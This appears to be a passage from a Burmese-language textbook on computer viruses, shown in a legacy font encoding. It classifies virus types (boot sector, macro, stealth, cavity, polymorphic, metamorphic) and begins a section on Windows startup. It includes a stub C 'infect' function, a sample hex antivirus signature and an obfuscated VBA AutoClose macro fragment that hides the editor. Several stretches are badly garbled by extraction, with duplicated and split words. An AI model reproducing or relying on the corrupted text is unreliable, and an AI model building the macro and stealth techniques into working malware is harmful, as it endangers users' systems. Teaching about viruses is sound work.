( Z) Floppy Drive rS Boot vkyf&ef BudK;pm;csdefwGif Hard Drive udk zwfEdkifpGrf;r&Sdjcif;/
( ps) y½dk*&rf\ t½G,ftpm;onf ajymif;vJaejcif;/
(n) rSwfOmPftm; toHk;jyKaeonf[k xif&jcif;? uGefysLwmpepf aES;usoGm;jcif;/
Adkif;&yfpftrsdK;tpm; cGJjcm;jcif;
18/ Adkif;&yfpfrsm;tm; ul;pufonfht&mrsm;t&aomfvnf;aumif;? ul;pufyHkenf;vrf;t&
aomfvnf;aumif; cGJjcm;Edkifygonf/ Adkif;&yfpfonf uGefysLwmpepf\ tpdwftydkif;wpfckckudk ul;puf
jcif;t& atmufygtwdkif; trsdK;tpm;rsm; owfrSwfEdkifygonf-
(u) Boot System-sector Adkif;&yfpf/ Adkif;&yfpf\ypfrSwfonf Master Boot Record ESifh
DOS Boot Record System Sector rsm;jzpfonf/ xkdae&mrsm;udk uGefysLwmpwif
csdefwGif zwf½Itvkyfvkyfavh&Sdonf/ Disk wdkif;ü System Sector wpfckpD&Sdonf/
Boot vkyfEdkifaom CD-ROM rsm;tm; Adkif;&yfpful;pufcHcJh&aomf ul;puf&m &if;
jrpfjzpfoGm;Ekdifygonf/ uGefysLwmpwifcsdefwGif DOS Boot Sector udk tvkyfvkyf
onfhtwGuf Adkif;&yfwdkufcdkufrItwGuf tm;enf;csufjzpfapygonf/ Boot Sector
tm;zsufqD;jcif;onf Disk tm;zwfr&atmif jyKvkyfEkdifygonf/ þ Sector tm;
SYS (odkY) FORMAT /S command jzifh jyefa&;Edkifygonf/ Boot Sector wpfckwGif
Boot rvkyfEdkifaom Floppy Disk rsm;yif Adkif;&yfpfrsm;yg&SdEdkifygonf/ tu,fí
ul;pufcHxm;&aom Floppy onf uGefysLwmxJwGifusefaeygu Floppy rS Boot
vkyf&efBudK;pm;csdefwdkif;wGif uGefysLwmpepftm; ul;pufapayvdrfhrnf/ System
Sector Adkif;&yfpfonf Disk \ Executable uk'frsm;udk tusdK;oufa&mufrI&SdNyD;
Boot Sector Adkif;&yfpfrsm;onf Disk \ Boot Sector rsm;tay: oufa&mufrI&Sd
onf/ Disk wdkif;wGif y½dk*&rfrsm;udk odrf;qnf;Edkifaom Sector rsm;&Sdavonf/
System Sector wGif 512 Bytes rQom&Sdaom Disk ae&mvGwfyg&Sdavonf/ xdYk
aMumifhyif System Sector Adkif;&yfpfrsm;onf ¤if;wdkY\uk'fudk tjcm;aom Disk ae
&mvGwftcsdKUwGif zGufMujcif;jzpfonf/ System Sector Adkif;&yfpfrsm;udk t"du
jzefYjzL;o,faqmifolonf Folppy Disk jzpfonf/ xdkAdkif;&yfpfrsm;onf omref
tm;jzifh rSwfOmPfrsm;wGif tajcjyKavh&Sdonf/ tcsdKUaom Sector Adkif;&yfpfrsm;
onf ul;pufcHxm;&aomzdkifrsm;rSvnf; ysHUESHYavh&Sdonf/ ¤if;wdkYudk Multipartite
Adkif;&yfpfrsm;[kac:a0:onf/ Boot Sector Adkif;&yfpful;pufcH&NyD;aemuf Master
Boot Record udk tjcm; Sector ae&mwpfckodkY a½TUajymif;cH&yHkudk yHk(4)wGif awGYjrif
Ekdifygonf/
nals V 1.0 - rhythm

yHk(4) Stonedd Adkif;&yfpf rul

r ;pufcifESESifh ul;pufcHxm;&NyD x ;aemmuf Disk tmm;awGYjrif&ykyHk
( c) y½dk*&rfAdkif;&yf & pf/ þAdkifif;&yfpfrsm;o onf omreft tm;jzifh .bbin? .com? ..exe? .dll
(
(Dynamic L
Link Library))? .ovl (Overlay)? .drv (Driver)
( ESifh .sys (Device Driver)
wdkYuJhodkYaomm extension &Sdonfh uk'f'frsm;tvkyfvk vyfEdkifaom y½dk*&rfzdkifrrssm;udk ul;
pufavonf nf/ Oyrmtmm;jzifh Cascadde onf y½dk*&rf * Adkif;&yfpjzpf
pf avonf nf/
( *) Multipartit
M te Adkif;&yfpf/ þAdkif;&yfpfrsm;onf y½ ½dk*&rfzdkifrsmm;udk ul;puf
ufNyD; Boot
Sector rsm;u udk ul;pufav vonf/ Invvader? Flip EESifh Tequila wdkYonf Muultipartite
Adkif;&yfpfrsm;;jzpfMuonf/
(C) uGef,ufAdkif;&yfpf/ uGef,ufAdkif;&yfppfrsm;onf uG uefysLwmuG uGef,uf\ CCommand
rsm;ESifh Prottocol rsm;udk toHk;jyKí yGm;Edkifavo onf/ ¤if;wd wkYonf tD;aar;vfrSw
qifh ysHUESHYonf
n/ xdkAdkif;&yfyfpfrsm;onf Remote Serrver qDodkY uk u'frsm;udk vT
vajJ ymif;NyD;
R
Remote uGefysLwmrsm;rSrSwqifh olwdkY\uk'fudk tvkyfvkyapEd yf kifpGrf;&Savonf
ad /
uGef,ufAdkif;&yfpfrsm;on nf Disk ayy:wGif zdkirfrssm;udk cPw wjzKwf xkw wfvkyfav
onf/
( i) Source uk'f'fAdkif;&yfpf/ uG uefysLwmpeepfay:&Sd Soource uk'frsm;ud m k Trojann uk'frsm;
ul;pufcHxm;&onfm [k xif&avmuf ufaponf/ ,aeYcwfwGif Compilerr rsm;ESifh
y½dk*&rfa&;o om;onfhbmompum;rs
m m ajrmufrsm;pGm&SdonfhtwG
m; t uf Souurce uk'f
rsm;onfvnf n; yHkpHtrsdK;rsd
; K;ESifh &Sdaeayonf
e / x
xdkYaMumifhyif Source uk''ffAdkif;&yfpf
onf wdusaomtoG a iESEf ifh r&SdEdkifay/
y 'kwd,t tcsuftaejjzifh vltcsdKUo om xdkuJh
odkYAdkif;&yfpfrs
rsm;udk a&;EdEdkifayonf/ tb,faMumifhqdkaomf ul;pufcH&rnf & hom;
aumifudk &SmazG m &efcufjcif;? ul;puf&ef & cufcJjcif;;wdkYaMumifh jzpf
jz onf/

#include <stdio.h>
void infect(void)
{
/* virus code to search for *.c files to infect */
}
void main(void)
{
infect(); /* Do not remove this function!! */
printf("Hello World!");
}
yHk(5) C y½dk*&rfbmompum;\ rl&if;uk'fzdkifjzpfaom .C zdkiftm; Adkif;&yfpful;pufcHxm;&yHk
( p) zdkifAdkif;&yfpf/ zdkifAdkif;&yfpfonf Executable zdkifrsm;udkom ul;pufonf/ ¤if;wdkY
onf olwdkY\uk'frsm;udk rl&if;zdkifodkY xnfhoGif;NyD; tvkyfvkyfapaomaMumifhjzpf
onf/ zdkifAdkif;&yfpfajrmufrsm;pGm&Sdaomfvnf; ¤if;wdkYonf wpfckESifhwpfck rwlnD
Muacs/ ¤if;wdkYonf enf;rsdK;pHkjzifh ul;pufMuNyD; zdkiftrsdK;tpm; awmfawmfrsm;rsm;
wGif awGY&SdEdkifonf/ awGYaeMuzdkifAdkif;&yfpfrsm; tvkyfvkyfyHkrSm zdkifemrnfaemuf
wGif .com (odkY) .exe ESifhqHk;aom zdkifrsm;uJhodkY vG,u f lpGm ul;pufEkdifaom zdkift
rsdK;tpm;udk ppfaq;ygonf/ y½dk*&rftvkyfvkyfpOftwGif; Adkif;&yfpfonfvnf;
tvkyfvkyf&NyD; zdkifrsm;udk ul;pufap&ygonf/ Adkif;&yfpfwpfcktm; xyfjyifa&;jcif;
onf rvG,fulvSay/ tb,fhaMumifhqdkaomf xyfjyifa&;cH&aomy½dk*&rfrsm;onf
rnfokdYrQ rSefuefaomvkyfaqmifrIudk rvkyfaqmifEdkifawmhaomaMumifhjzpfonf/
xkdAdkif;&yfpfrsdK;wdkYonf csufcsif; pdppfcGJjcm;Edkif&ef vdktyfygonf/ ¤if;wdkY\uk'fudk
y½dk*&rfwpfckxJodkY rxnfhoGif;rD tcsdKUaomzdkifAdkif;&yfpfrsm;onf rlv instruction
uk'frsm;udk odrf;qnf;NyD;aemuf rlvy½dk*&rfudktvkyfvkyfap&ef tcGifhay;&av
onf/ xkdrSom y½dk*&rfonf rlvtaetxm;twdkif;jzpfaeayrnf/ zdkifAdkif;&yfpf
rsm;onf System Sector Adkif;&yfpfrsm;tvkyfvkyfouJhodkYyif uGefysLwmrSwfOmPf
wGif; tajcjyK&ef udk,fa,mifazsmufenf;ynmtoHk;jyKí olwdkY\wnf&SdrIudk zHk;
uG,fMuonf/ tu,fí Directory wpfckatmufwGif&Sdaomzdkifrsm;udk pm&if;jyKpk
NyD;aomf rnfonfhzdkifwdk;yGm;rIrQ awGYjrif&awmhrnf r[kwfay/ tu,fí uGefysL
wmoHk;pGJolrS zdkifudkzwf&ef BudK;yrf;cJo h nf&Sdaomf ¤if;udk Adkif;&yfpfrS Mum;jzwfzrf;
,lNyD; rlvzdkifudk uGefysLwmoHk;pGJolxH jyefydkYrnfjzpfygonf/ ul;pufyHkenf;vrf;
ajrmufrsm;pGm&SdonfhtwGuf zdkifAdkif;&yfpfrsm;onf zdkiftrsdK;tpm;awmfawmfrsm;
rsm;udk ul;pufEkdifygonf/
(q) Macro Adkif;&yfpf/ Macro Adkif;&yfpfrsm;onf owfrSwfxm;aomzdkifwpfckudk zGifhcsdef
wGif tvdktavsmufyif tpDtpOftwdkif; vkyfaqmifavonf/ Macro Adkif;&yfpf
rsm;onf tjcm;aomtrsdK;tpm;xuf tEÅ&m,f&SdrI tenf;i,favsmhyg;avonf/
Macro Adkif;&yfpfrsm;onf tD;ar;vfrSwqifh ysHUESHYavonf/ tcsuftvufrsm;om
ygaomzdkifrsm;onf Adkif;&yfpfrsm;ysHUESHEY dkifjcif; r&Sdacs/ odkYaomf wpfcgw&HwGif t
csuftvufzdkifESifh zdkifMum;&Sd pnf;tm; omrefuGefysLwmoHk;pGJolrsm;u tcsdKUy½dk
*&rfrsm;wGif toHk;jyKaom Macro bmompum;rsm;jzifh vG,fvifhwul ausmfvTm;
Edkifygonf/ Adkif;&yfpfa&;olrsm;onf Macro vkyfaqmifrIyg&Sdaom Microsoft xkwf
ukefrsm;jzpfaom Word? Excel ESifh tjcm; Office y½dk*&rfrsm;\ tm;enf;csuf

tm; wkdufcdkufEkdifygonf/ xdkYjyif PDF zdkifrsm;udk zwf½IEdkifaom? jyifqifa&;om;
Ekdifaom Adobe Acrobat \ Professional Version wGifyif aemufqHk;xkwf Macro
uk'frsm;udk xnfhoGif;wdkufcdkufEdkifygonf/
19/ ul;pufyHkenf;vrf;rsm;t& Adkif;&yfpfrsm;tm; atmufygtwkdif; owfrSwfEdkifygonf-
(u) Terminate and Stay Resident Adkif;&yfpf (TSR)/ TSR Adkif;&yfpfrsm;onf tvkyf
csdefwpfckvHk;twGif;jzpfap? vufcHypfrSwfy½dk*&rf tvkyfvkyfNyD; ydwfvdkufNyD;
aemufjzpfap rSwfOmPfxJwGif tNrJaeavh&Sdonf/ uGefysLwmudk pufydwfNyD; jyef
zGifhrSom xdkAdkif;&yfpfrsm;udk z,f&Sm;Ekdifavonf/
( c) Direct (odkY) Transientent Adkif;&yfpf/ þAdkif;&yfpfrsm;onf olwdkYtajccsrnfhvufcH
uk'fqDodkY xdef;csKyfrItm;vHk; vTJajymif;ay;vdkufNyD; jyKjyifNyD;jzpfrnfh ypfrSwfy½dk*&rf
udka½G;cs,fNyD; y½dk*&rftm;ysufpD;aponf/
( *) Companion Adkif;&yfpf/ Companion Adkif;&yfpfonf ypfrSwfxm;aomy½dk*&rfzkdifuJh
odkY wlnDaomzdkifemrnf,lNyD; udk,fydkifzdkifudk odrf;avonf/ xdkzdkifudk zGifhrdcJhvQif
Adkif;&yfpfonf uGefysLwmudk ul;pufNyD; Hard Disk xJ&Sdtcsuftvufrsm; jyKjyif
jcif; cH&avonf/
(C) Polymorphic Adkif;&yfpf/ uGefysLwmpepftwGif;&Sd Adkif;&yfpfrsm;tm; ppfaq;onfh
Anti-virus rsm;tm; Za0Z0gjzpfap&eftwGuf þAdkif;&yfpfrsm;udk a&;om;zefwD;
Muonf/ þAdkif;&yfpfrsdK;tm; ajc&mcHvdkuf&ef cufcJavonf/ tb,fhaMumifhqdk
aomf ¤if;wdkY\vu©Pmrsm;onf ul;pufNyD;wkdif; ajymif;vJaeaomaMumifhjzpf
onf/ Adkif;&yfpfa&;om;olrsm;onf Metamorphic Engine rsm;ESifh Adkif;&yfpfa&;
om;Ekdifonfh Toolkit rsm;ukdyif zefwD;Muavonf/
( i) Stealth Adkif;&yfpf/ þAdkif;&yfpfrsm;onf Anti-virus y½dk*&rfrsm;rS rawGY&Sd? rod&SdEkdif
ap&ef ¤if;wdkYtvkyfvkyfcsdefwGif a½G;cs,fxm;aom Service Call Interrupt rsm;tm;
ajymif;vJypfjcif;? zsufqD;ypfjcif;jzifhykef;uG,favonf/ xdk Service Call Interrupt
rsm;ESifhywfoufí vkyfaqmifcsufrsm;tm; aqmif½Guf&ef awmif;qdkonfhtcg
Adkif;&yfpfuk'frsm;jzifh tpm;xdk;ypfavonf/ þAdkif;&yfpfrsm;onf Anti-virus y½dk
*&rfrsm;rS ¤if;wdkYwnf&SdrIudk ykef;uG,fEkdif&eftwGuf rSm;,Gif;aom tcsuftvuf
rsm;tm; azmfjyavonf/ Oyrmqdk&aomf – Stealth Adkif;&yfpfonf ¤if;jyKjyifxm;
aom vkyfaqmifcsufrsm;udk zHk;uG,fxm;NyD; yHk(6)wGifjrif&onfhtwkdif; rSm;,Gif;
aomazmfjycsufrsm;tm;ay;ydkYavonf/ xdkYaMumifh ¤if;onf ypfrSwfpepf\tpdwf
tydkif;rsm;tm; &,lNyD; ¤if;\Adkif;&yfpfuk'frsm;udk 0Sufavonf/ Frodo? Joshi ESifh
Whale wdkYonf Stealth Adkif;&yfpfrsm;jzpfMuonf/ Stealth Adkif;&yfpfjzefYjzL;o,f
aqmifolxJrS wpfckrSm Rootkit jzpfonf/ Rootkit wpfckudk ae&mcsjcif;jzifh Adkif;
&yfpfwdkufcdkufrIwGif tusdK;qufrsm;jzpfaponf/ tb,fhaMumifhqdkaomf Rootkit
rsm;udk Trojan rsm;rSwqifh ae&mcsxm;&aomaMumifhjzpfNyD; xdkYaMumifhyif rnf
onfh Malware udkrqdk 0SufEkdifMujcif;jzpfonf/
nals V 1.0 - rhythm

yHk((6) Stealth Adkif;&yfpfonf n ul;pufjcifif;rcH&aomzdzdkiftm; Antii-virus aqmhmhzf0Jvfrsm;t tm;

a kYavonf
ay;yd nf/
(p) Cavity
C Adkif;&yfpf/ tcsdKUaomy½d
U k*&rfrfzdkifrsm;wGif ae&mvGwf{&d,mrsm; &Sdygonf/
C
Cavity Adkif;&yf
& pfrsm;onfnf olwdkY\uk'frsm;udk aee&mvGwfrsm;wG ; if odrf;qnfq ;onfh
twGuf aee&mvGwfjznf nfhonfhAdkif;&&yfpf[kvnf; xif&Sm;ygo onf/ Adkif;&yf & pfonf
vGwfaeaommae&mwGif rl&if;uk'frsmm;udk zsufqD;;jcif; vHk;0rjjyKbJ ae&mccsxm;av
onf/ ¤if;ul u;pufrnfhzdkiftwGif; ¤if;udk,fwdkifaae&mcsavo onf/ þAdkiiff;&yfpfrsm;
tm; toHk;jyKcJavonf nf/ tb,fhaMumifhqdkaommf uk'frsm;u udk a&;om;&&ef cufcJ
aomaMumifhjzpfonf/ þAd þ kif;&yfpfrsmm;udk ae&mv vGwfjznfhol[k
[vnf;ac:o onf/ t
b,fhaMumifhqdkaomf ypfpfrSwfy½dk*&rfrfuk'ftwGif;odkY ¤if;wdk\uk \
Y 'frsm;udk ae&mcs
xm;jcif;jzifh zdkift½G,ftpm;ajymif
t ;vJ
vjcif; r&SdaomaM
o umifhjzpfponf/ ow wdjyK&efrSm
zdkift½G,ftpm;ajymif;vJjcif;r&Sdaomfmfvnf; Cycclic Retundduncy Checkk (CRC)
wefzdk;ajymif;vJavh&SdaomaMumif
o h CRC
C rsm;udk ppfaq;ao
om y½dk*&rfrsm;wGifrl
Adkif;&yfpfuk'omtvk
f yfvk
vyfNyD; rlvy½d y k*&rfrSmrl tvkyfrvkyfyfawmhay/ x xdkYaMumifh
C
Cavity Adkif;&yf
& pf ul;pufufcHxm;&aomm y½dk*&rfrsmm;udk zGifhvQif yGifhrvmMu Mujcif;jzpf
onf/ Cavitty Adkif;&yfpfrsm;onf yHk(7)wG 7 if awGYjrif&onfhtwk wddif; zdkif\tqH
t k; (uk'f
Section tq qHk;&Sd ae&mvG
vGwfrsm; (Cavve))wGif Adkif;&yfpfuk'frs rsm;udk a&;o om;MuNyD;
zdkifrsm;\ uk u'f pwifzwf w½Ionhfae&&m (Addresss of Entry Point) P udkajymif;vJypf
avonf/ þod þ kYjzifh Adifik f;&yfpfuk'frsmm;udk pwifzzwf½I tvkyfyfvkyfapNyD;rS rl&if;y½dk
*&rfuk'frsm;;udk tvkyfvk vyk faponf/
yHk(7) C
Cavity Adkif;&yyfpfu y½dk*&rf
& \ae&mvG
vGwf (00 Byte) rsm;wGif Adkif;&yfpfuk'frsm;jzifh jznh
nhfxm;yHk/

(q) Tunneling Adkif;&yfpf/ þAdkif;&yfpfrsm;onf BIOS ESifh DOS wdkYtwGif; ae&mcs
xm;Edkifa&;tvdkYiSm pufvnfywfrIpepf\ awmif;qdkrIrsm;udk apmifhMunhfaeonfh
Mum;jzwfy½dk*&rfrsm;\ ajcvSrf;rsm;udk aemufa,mifcHonf/ Tunneling Akdif;&yfpf
rsm;onf Anti-virus y½dk*&rfrsm;rS ykef;cdk&eftwGuf pGrf;aqmifEkdifMuygonf/
( Z) Camouflage Adkif;&yfpf/ Camouflage Adkif;&yfpfonf Application tppftrSefrsm;
jzpfouJhodkY zHk;uG,fEkdifavonf/ xdkAdkif;&yfpfrsm;udk &SmazG&ef rcufcJvSyg/ t
b,fhaMumifhqdkaomf Anti-virus y½dk*&rfrsm;onf xdkAdkif;&yfpfrsm;udk vG,fulpGm
ajc&mcHEkdifonfhtqifhodkY wkd;wufvmaomaMumifhjzpfonf/
(ps) Bootable CD-ROM Adkif;&yfpf/ þAdkif;&yfpfrsm;onf CD-ROM rsm;wGif jzefYjzL;Mu
NyD; omreftm;jzifh csHKUxm;aomyHkpHjzifh odrf;qnf;Muonf/ tu,fí ul;pufcH
xm;&aom CD-ROM jzihf Boot vkyfcJhaomf Hard Disk wGifyg0ifaomt&mrsm;
onf zsufpD;cH&csifcH&ayrnf/ rnfonfh Anti-virus y½dk*&rfrS þAdkif;&yfpfudk
rwm;qD;EdkifMuacs/ tb,faMumifhqdkaom CD-ROM rS Boot vkyfcsdefwGif Anti-
virus aqmhzf0Jvf (odkY) uGefysLwmpepfonfyif tvkyfrvkyfao;aomaMumifhjzpf
onf/
udk,fwkdifuk'fjyifEkdifaomAdkif;&yfpfrsm;
20/ Anti-virus y½dk*&rftrsm;pkonf omrefy½dk*&rfrsm;twGif;wGif Adkif;&yfpf Pattern rsm;udk
ppfaq;pHkprf;Muygonf/ xdkAdkif;&yfpf Pattern udk Adkif;&yfpf Signature [kvnf;ac:onf/ Signature onf
wdusaomAkdif;&yfpf (odkY) Adkif;&yfpfrsdK;EG,fudk udk,fpm;jyKaom HEX uk'frsm;jzpfMuygonf/ (erlem
Pattern/ B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35
E8) tu,fí xdkzdkif Pattern rsm;udk awGYcJhaomf Anti-virus y½dk*&rfonf uGefysLwmtoHk;jyKoltm;
zdkifonf Adkif;&yfpful;pufcHxm;&NyD;jzpfaMumif; today;NyD; toHk;jyKolrS xdkzdkifudk zsufcsifvQif zsufEdkif
avonf/ xdkul;pufcH&onfhjzpfpOfwGif uk'frsm;onf jyKjyifcHxm;&NyD;jzpfaMumif; awGY&SdEdkifonf/
udk,fwdkifuk'fjyifjcif;enf;vrf;udk uGefysLwmacwfOD;ydkif;ü tuefYtowf&Sad om rSwfOmPfudk acRwm
Edkif&eftwGuf toHk;jyKcJhjcif;jzpfNyD; 1980cefYwGifrl DOS *drf;rsm;ü Copy Protection rsm;tm; zHk;uG,f
Ekdif&ef toHk;jyKcJhaMumif; awGY&Sd&ygonf/ xdkenf;vrf;rsm;udk tajccHí udk,fwkdifuk'fjyifonfhAdkif;&yfpf
rsm;udk zefwD;Mujcif;jzpfonf/ udk,fwdkifuk'fjyifEkdifaomAdkif;&yfpfrsm;udk atmufygtwkdif;trsdK;tpm;
rsm; cGJjcm;Ekdifavonf-
(u) ½dk;&Sif;aom ukd,fwdkifuk'fjyifonfhAdkif;&yfpfrsm;/ þAdkif;&yfpfrsm;onf uk'ftwGif;&Sd
Subroutine rsm;tm; vG,fvG,fyif vJvS,fygonf/ xdkYaMumifh ¤if;wdkYonf jyó
emtenf;i,frQudkom jzpfapygonf/
( c) Key t&Sifjzifh 0Sufjcif;/ Akdif;&yfpfudk Encryption Key wpfckjzifh 0Sufonf/ ¤if;
wGif Decryption Module wpfckESifh 0Sufxm;aom aumfyDwpfck yg0ifonf/ ul;
pufcHxm;&aom zdkiftoD;oD;wGif Adkif;&yfpfudk rwlnDaom Key rsm; aygif;pyf
toHk;jyKí 0Sufxm;avonf/ odkYaomfvnf; Decrypting Module tydkif;onf
rajymif;vJbJ usef&Sdaeygonf/ Adkif;&yfpfudk Adkif;&yfpf Scanner rsm;ESifh Signature
rsm;jzifh wdkuf½dkufpHkprf;&ef rjzpfEdkifyg/ odkYaomf Decryption Module udkrl pHkprf;
od&SdEkdifygonf/ toHk;jyKxm;aom Decryption enf;vrf;onf Byte wdkif;udk yifr

Adkif;&yfpfrS xkwfvkyfodrf;qnf;xm;aom usyef; Key wpfckjzifh XOR vkyf&efjzpf
avonf/
( *) Polymorphic uk'fAdkif;&yfpf/ þAdkif;&yfpftrsdK;tpm;onf zdkifwpfcktm; Decrypt-
ion Module jzifhom Decode vkyfEdkifaom Encrypt vkyfxm;onfh Polymorphic
uk'fjzifh ul;pufaponf/ Polymorphic Adkif;&yfpfrsm;onf ¤if;wdkYtm; Anti-virus
y½dk*&rfrsm; pHkprf;rod&SdEdkifap&eftwGuf zdkifrsm;udkul;pufyGm;rsm;onfhtcsdefwGif
¤if;wdkY\uk'frsm;udk jyKjyifavonf/ ¤if;wdkYonf Encryption Module ESifh
Instruction tpDtpOfrsm;udkajymif;vJypfavonf/ Polymorphism jzpf&eftwGuf
usyef;*Pef;rsm;xkwfjcif;udk toHk;jyKavonf/ Polymorphic uk'frsm;udk vkyf
aqmifEdkif&ef Mutation Engine udk toHk;jyK&avonf/ Mutator rsm;onf Anti-
virus rsm;rS rSefuefaom pHkprf;jcif;enf;vrf;rsm;toHk;jyKrS ¤if;wdkYtm; od&SdapEdkif
atmif pGrf;aqmifEkdifMuavonf/ Adkif;&yfpfESdrfESif;a&;uRrf;usifolrsm;tm; uk'f
rsm;udk od&Sdjcif;rSumuG,f&eftwGuf aES;auG;apaom Polymorphic uk'frsm;udk
vnf; toHk;jyKavh&SdMuygonf/ uGefysLwmpepfwGif Polymorphic Adkif;&yfpf &Sd?
r&Sdudk ppfaq;Edkif&eftwGuf Integrity Checker udk toHk;jyKavh&Sdonf/ Anti-
virus y½dk*&rfrsm;onf Polymorphic uk'fAdkif;&yfpfrsm;udk ppfaq;Edkif&eftwGuf
Emulator rsm;udktoHk;jyKum Adkif;&yfpfuk'frsm;udk Decrypt vkyfMu&onf/ (odkYr
[kwf) Encrypt vkyfxm;aom Adkif;&yfpf Pattern rsm;udk aocsmpdppf&avonf/
tcsdKU Developer rsm;onf ¤if;wdkYy½dk*&rfrsm;tm; Crack vkyfjcif;rSumuG,fEkdif
&eftwGuf y½dk*&rfwGif Polymorphic uk'frsm;udk xnfhoGif;a&;om;avh&Sdonf/
xdktcg tcsdKUaom Anti-virus y½dk*&rfrsm;onf xkdzkdifrsm;udk Adkif;&yfpfrsm;[k rSm;
,Gif;pGm owday;azmfjyavh&Sdonf/
'BsbK
Sub AuTOclOSE()
oN ERROr REsuMe NeXT
SHOWviSuAlBASIcEditOr = faLsE
If nmñGG > WYff Then
For XgfqLwDTT = 70 To 5
JhGPTT = 64
KjfLL = 34
If qqSsKWW < vMmm Then
For QpMM = 56 To 7
If qtWQHU = PCYKWvQQ Then
If lXYnNrr > mxTwjWW Then
End If
If FFnfrjj > GHgpE Then
End If
yHk(7) Polymorphic uk'f Macro wpfck
(C) Metamorphic uk'fAdkif;&yfpf/ Metamorphic Adkif;&yfpfrsm;onf Executable zdkifrsm;
udk topfxyfrHul;puf&eftwGuf olwdkYudk,folwdkY jyefjyifa&;Muavonf/ xdkAdkif;
&yfpfrsdK;onf ½IyfaxG;vSNyD; tvkyfvkyf&eftwGuf Metamorphic Engine rsm;udk
toHk;jyKMuavonf/ Adkif;&yfpfrsm;toHk;jyKaomuk'fonf ,m,Duk'ftaejzifh
nals V 1.0 - rhythm

ajymif;vJjcifif;cH&NyD;? ¤ifif;aemuf rlvuk v 'ftoGiiffudk jyefvnf n&,lMuygo onf/ þ
enf;vrf;wGifi Anti-viruus aqmhzf0Jv vfrf sm;rS Patteern rsm;udod
kod&Sdjcif;rS a&S&mif&Sm;&ef
rlv Algoriithm udk raajymif;vJbJ&aponf &Sd / Metamorphic
M c uk'frsm;on nf Poly-
m
morphic uk rsm;xuf ydkítpGrf;xuf
u'f x avonf/ þAdkif;&yfpfprsdK;wGif ½IyyffaxG;&Snf
vsm;aomuk u'frsm; yg&Sdonf o / emrn nfBuD; Metam morphic Adkif
if;&yfpfrsm;rSm Win32/
Simile ESifh Zmist
Z wdkYjzpfonf/ Win332/Simile udk Assembly y½dk*&rfbmo ompum;
ESifha&;om;x xm;NyD; uk'faa& 14000 ausmfyg&Sdonf/ Adkif;&yfpfpfuk'f\ 90% ausmf
onf Metaamorphic Enngine \tpdpdwftydkif;rsmm;jzpfonf/ Zombie.Miistfall [k
vnf;ac:a00:aom Zm mist onf uk u'faygif;pnf nf;jcif;enf;ynmudk to oHk;jyKaom
yxrqHk;Adkif;&yf
; pfjzpfavonf v / uk'wpf w
f ckudk tjjcm;uk'fqD ud uk,fwdkifaygifif;xnfhNyD;
aemuf uk'fudk xyfrHxwf xk ,lNyD; Exxecutable zdkififrsm;udk jyefvnf
v wnfaq qmufav
onf/ þAdkifi;&yfpfrsm;o onf Anti-viirus y½dk*&rfrfrsm;rS Emuulator jzifhpHpkprf;jcif;udk
umuG,fEdkifMuavonf/ Metamorpphic enf;ynmjzifhyGm;vd vdkufaom aemufa Adkif;
&yfpfzdkifwpfzdzdkifonf rlvzd v kifESifh to oGifjcif; vHk;00rwlawmhay/ y Metamorrphic Adkif;
&yfpfrsm;on nf Adkif;&yfprs rf sm;pGmudk o, ,faqmifomGm;EkdifNyD; tcsdsdKUaom Metaamorphic
Adkif;&yfpfrsm;onf rwlnD naD om pufv vnfywfrIpeepfrsm;wGif tvk t yfvkyfEkdiiffayonf/
M
Metamorphi ic Adkif;&yfpfrs rsm;\ yHkoP²meftqifhq qifhajymif;vJrIrItm; yHk(8)wGif awGY
jrifEkdifygon nf/
yHk(8) yHoP²
k
o mefESifh t½G
t ,ftpm;u
uGJjym;oGm;MMuonf
u h Metamorphic Adkif
if;&yfpfrsm;

tcef;(3)
uGefysLwmtvkyfvkyfyHk
1/ ,aeYacwfAdkif;&yfpfrsm;onf ul;pufjcif;oabmxuf tzsufoabmrsm;vkyfaqmifjcif;?
uGefysLwm\ Setting rsm;tm; jyifqifjcif;rsm;udk vkyfaqmifvmonfhtwGuf Adkif;&yfpfrsm;\zsufqD;rI
tEÅ&m,fudk umuG,fEkdif&ef uGefysLwmpepftvkyfvkyfyHkudk tMurf;zsif; od&Sdxm;&rnfjzpfygonf/
uGefysLwmpufvnfywfrIpepfpwifyHk? Adkif;&yfpfrsm; jyifqifzsufqD;Edkifonfh Windows Registry ESifh
Adkif;&yfpfrsm;t"duxm;wdkufcdkufaom uGefysLwmzdkit f rsdK;tpm;rsm;taMumif;udk &Sif;&Sif;vif;vif;
od&Sdxm;rSom Adkif;&yfpfwdkY\ oabmobm0udk ydkrdkem;vnfEkdifrnfjzpfygonf/
Windows XP/2000/NT Startup Process
2/ Adkif;&yfpfrsm;onf uGefysLwmpepfpwif&eftwGuf vdktyfaomzdkifrsm;udk zsufqD;avh&Sd

onf/ xdkYaMumifh uGefysLwmpepf rnfodkYpwifonf? rnfonfhzdkifrsm;udktoHk;jyKonfudk em;vnfod&Sd
xm;&efvdktyfygonf/ xGuf&SdNyD;aom uGefysLwmpufvnfywfrIpepfrsm;rSm Windows 95? Windows
98? Windows Me? Windows NT? Windows 2000? Windows XP? Windows Server 2003/2008/2012?
Windows 7 ESifh Windows 8 wdkYjzpfonf/ tjcm; rwlnDaom Mac OS ESifh Linux OS wdkY&Sdaomfvnf;
¤if;pepfrsm;wGif Adkif;&yfpfrsm; ysHUESHYrI enf;yg;vSavonf/ Microsoft OS rsm;teuf ½Hk;rsm;? vkyfief;cGif
rsm;? wpfudk,fa&oHk;uGefysLwmrsm;wGif ,aeYtoHk;rsm;aeaom OS rsm;rSm Windows XP? Windows
7/8 ESifh Windows Server rsm;jzpfMuonf/
3/ Windows 98 ESifh Windows Me wdkYwGif MS-DOS \ vkyfaqmifcsufrsm;udk OD;pGmvkyf

aqmifNyD;rSom Windows OS udkvnfywfaponf/ Windows NT ESifh ¤if;\rsdK;qufrsm;jzpfaom
Windows 2000 ESifh Windows XP wdkYwGif vkyfaqmifyHkjcif; uGJjym;Muavonf/ Windows NT OS
rsm;wGif Bootstrap Process tm; ,cif OS rsm;twdkif; pwifavonf/ odkYaomf Active Partition \
Secondary Loader u Disk tm; FAT (odkY) NTFS pepfjzifh Format vkyfxm;jcif; &Sd? r&Sdudk qHk;jzwfNyD;
Boot Partition \ Root Directory rS ntldr zdkifudk zwfavonf/
4/ ntldr rS boot.ini zdkifudk&SmazGavonf/ boot.ini wGif OS rsm;udk a½G;cs,fEkdifonfhpm&if;

wpfckyg&SdNyD; ¤if; Windows OS rsm;udk rnfonfhyHkpHESifhpwifrnfqdkonfh a½G;cs,frIyHkpHrsm;vnf;
